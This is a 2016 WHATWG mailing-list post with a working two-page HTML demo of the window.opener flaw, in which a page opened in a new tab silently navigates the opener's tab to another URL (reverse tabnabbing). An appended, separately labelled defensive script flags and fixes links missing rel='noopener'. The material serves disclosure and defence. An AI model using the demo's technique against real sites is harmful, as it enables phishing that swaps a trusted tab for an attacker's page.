- From: Michael A. Peters <mpeters@domblogger.net>
- Date: Wed, 30 Nov 2016 19:33:48 -0800
- To: whatwg@lists.whatwg.org
On 11/30/2016 06:21 PM, Michael A. Peters wrote:
> On 11/30/2016 05:23 PM, Ian Hickson wrote:
>> On Wed, Nov 30, 2016 at 4:49 PM Michael A. Peters
>> <mpeters@domblogger.net> wrote:
>>
>>> Right now the specification for window.opener() is seriously insecure,
>>> allowing for cross-domain script access by default.
>>
>> I believe that's a bit of an overstatement. There are certainly risks
>> involved in window.opener (they're briefly discussed in the spec itself),
>> but it doesn't remove the origin checks.
>
> Actually it does. Site A can link to Site B on a completely different
> domain and JavaScript on Site B has access to the window for Site A and
> can change the URL and other things.

Here is an easy demo showing the blatant cross-domain scripting vulnerability.

<!-- put this page as a.html on foo.com -->
<!-- The opener side: a plain target="_blank" link to another origin. -->
<html>
<head>
<title>Test target link</title>
</head>
<body>
<p><a href="https://bar.net/b.html" target="_blank">link to different domain</a></p>
</body>
</html>

<!-- put this page as b.html on bar.net -->
<!-- The opened side: it receives window.opener and navigates the opener's tab. -->
<html>
<head>
<title>Test window.opener</title>
<script type="text/javascript">
// Runs on bar.net, yet navigates the foo.com tab that opened this page.
if (window.opener && !window.opener.closed)
  opener.location = 'http://www.example.org/';
</script>
</head>
<body>
<p>The page on foo.com will have changed to http://www.example.org/ because
this page had script access to that window. Obviously a very serious phishing
concern, and probably other concerns.</p>
</body>
</html>
Received on Thursday, 1 December 2016 03:34:21 UTC
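The opener-side fix for the demo above is rel="noopener" (or rel="noreferrer", which implies it) on every target="_blank" link, so the opened page gets window.opener === null. As an added example that is not part of the thread, the following audit script flags anchors in static markup that still hand out an opener reference and rewrites them; the regex-based tag parsing and the sample markup are constructed for illustration.

```javascript
// Added example, not from the mailing-list post. A lint check for static
// HTML: any <a target="_blank"> without rel="noopener"/"noreferrer" gives
// the opened page a window.opener it can navigate (the demo's b.html).
// Attribute parsing is a deliberately simple regex, not a full HTML parser.

const ANCHOR_RE = /<a\b([^>]*)>/gi;
const ATTR_RE = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;

// Parse one start tag's attribute text into a lowercase-keyed map.
function parseAttrs(attrText) {
  const attrs = {};
  for (const m of attrText.matchAll(ATTR_RE)) {
    const value = m[2] !== undefined ? m[2] : (m[3] !== undefined ? m[3] : (m[4] || ''));
    attrs[m[1].toLowerCase()] = value.trim();
  }
  return attrs;
}

// True when the anchor opens a new context without severing window.opener.
function leaksOpener(attrs) {
  if ((attrs.target || '').toLowerCase() !== '_blank') return false;
  const rel = (attrs.rel || '').toLowerCase().split(/\s+/);
  return !(rel.includes('noopener') || rel.includes('noreferrer'));
}

// Return the href of every anchor in `html` that leaks its opener.
function findOpenerLeaks(html) {
  const leaks = [];
  for (const m of html.matchAll(ANCHOR_RE)) {
    const attrs = parseAttrs(m[1]);
    if (leaksOpener(attrs)) leaks.push(attrs.href || '');
  }
  return leaks;
}

// Rewrite leaking anchors so the opened page sees window.opener === null.
function hardenAnchors(html) {
  return html.replace(ANCHOR_RE, (tag, attrText) => {
    const attrs = parseAttrs(attrText);
    if (!leaksOpener(attrs)) return tag;
    const rel = attrs.rel ? attrs.rel + ' noopener' : 'noopener';
    const stripped = attrText.replace(/\srel\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/i, '');
    return '<a' + stripped + ' rel="' + rel + '">';
  });
}

// Constructed sample: the a.html link from the demo, plus an already-safe one.
const SAMPLE = '<p><a href="https://bar.net/b.html" target="_blank">link</a></p>\n' +
  '<p><a href="https://bar.net/c.html" target="_blank" rel="noopener">safe</a></p>';
```

Current browsers apply noopener to target="_blank" by default, but an explicit rel is still the portable fix for older engines and for window.open() callers that do not pass the noopener feature.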